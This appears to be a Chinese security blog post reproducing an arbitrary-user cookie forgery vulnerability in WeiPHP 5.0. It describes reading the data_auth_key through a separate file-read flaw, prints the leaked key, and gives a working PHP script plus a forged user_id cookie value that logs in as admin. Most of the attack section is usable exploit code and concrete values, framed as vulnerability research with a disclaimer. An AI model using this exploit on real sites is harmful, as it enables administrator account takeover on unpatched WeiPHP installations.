美文网首页
WeiPHP5.0 任意用户Cookie伪造

WeiPHP5.0 任意用户Cookie伪造

作者: N0puple | 来源:发表于2022-05-16 23:23 被阅读0次

本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。

漏洞简介

WeiPHP5.0是在2019年停止更新的一个系统,漏洞挺多的,跟着复现分析一下,这里复现一下 WeiPHP5.0的任意用户 Cookie伪造漏洞

影响范围

WeiPHP5.0最新版

可以据此下载

https://www.weiphp.cn/doc/download_source_installation.html

漏洞复现

首先要利用前些天发布的 WeiPHP5.0 前台任意文件读取 读取 data_auth_key

image.png

访问 /index.php/home/file/user_pics后下载该文件

image.png

找到 data_auth_key的值为

'data_auth_key' => 'kE^&%X.IpoDq2US*n!u>@G8+#Rd{_]a<QfJ3Lg9?'

接下来利用 think_encrypt伪造 cookie,稍微改造一下即可

<?php
highlight_file(__FILE__);
function think_encrypt($data, $key = '', $expire = 0)
{
    $key = md5("kE^&%X.IpoDq2US*n!u>@G8+#Rd{_]a<QfJ3Lg9?");

    $data = base64_encode($data);
    $x = 0;
    $len = strlen($data);
    $l = strlen($key);
    $char = '';

    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }

        $char .= substr($key, $x, 1);
        $x++;
    }

    $str = sprintf('%010d', $expire ? $expire + time() : 0);

    for ($i = 0; $i < $len; $i++) {
        $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);
    }
    return str_replace(array(
        '+',
        '/',
        '='
    ), array(
        '-',
        '_',
        ''
    ), base64_encode($str));
}

echo think_encrypt(1);

?>
image.png

因此可以构造

user_id=MDAwMDAwMDAwMIC1cp4

利用 hackerbar即可登录 admin

image.png

总结

这个漏洞利用的前提是获得 data_auth_key,本文中是结合了前台任意文件读取漏洞获取,总体来说,如果该前台任意文件读取漏洞被补掉之后,这个洞就几乎无用武之地了。

参考链接

  • http://wiki.peiqi.tech/wiki/cms/WeiPHP/WeiPHP5.0%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7Cookie%E4%BC%AA%E9%80%A0%20CNVD-2021-09693.html#weiphp5-0-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7cookie%E4%BC%AA%E9%80%A0-cnvd-2021-09693

github 链接:https://github.com/N0puple/vulPOC

想要获取更多资讯,或者获取文中环境可以关注公众号 “安全漏洞复现”,回复 “漏洞环境”

相关文章

  • WeiPHP5.0 任意用户Cookie伪造

    本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。...

  • 域渗透系列--撸域高价值漏洞整理

    0x01 Microsoft Exchange任意用户伪造漏洞(CVE-2018-8581) Microsoft ...

  • 常见的漏洞--csrf

    CSRF:跨站点请求伪造 大致原理: 用户A请求了正常的网站C,之后产生了cookie,之后用户A又浏览的恶意网站...

  • sctf2019 flag shop

    照着wp做 成功拿到secret伪造cookie 回到页面,buy flag,抓包将伪造的cookie写进去,在返...

  • 前端安全

    CSRF(跨站请求伪造) 攻击原理 当用户成功登录网站A后,网站A下发cookie并保存在浏览器中。当用户访问网站...

  • CVE-2018-8581复现

    漏洞描述: Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又...

  • JWT伪造cookie

    以全国信安比赛CISCN2018的web题easyweb为例 这道题的大部分人是用非预期解做出来的 密码为空,可以...

  • CSRF 跨站请求伪造

    伪造一个请求,达到某种目的。 浏览器的 Cookie 策略,包含 “Session Cookie”(临时 Cook...

  • (2018-05-29.Python从Zero到One)8、(T

    6 安全应用 知识点 Cookie操作 安全Cookie 跨站请求伪造原理 XSRF保护模板请求体HTTP报文头 ...

  • CISCN 2018 Writeup — Aurora

    Web easyweb 预期解:JWT伪造cookie,详见 https://www.jianshu.com/p/...

网友评论

      本文标题:WeiPHP5.0 任意用户Cookie伪造

      本文链接:https://www.haomeiwen.com/subject/lgrgurtx.html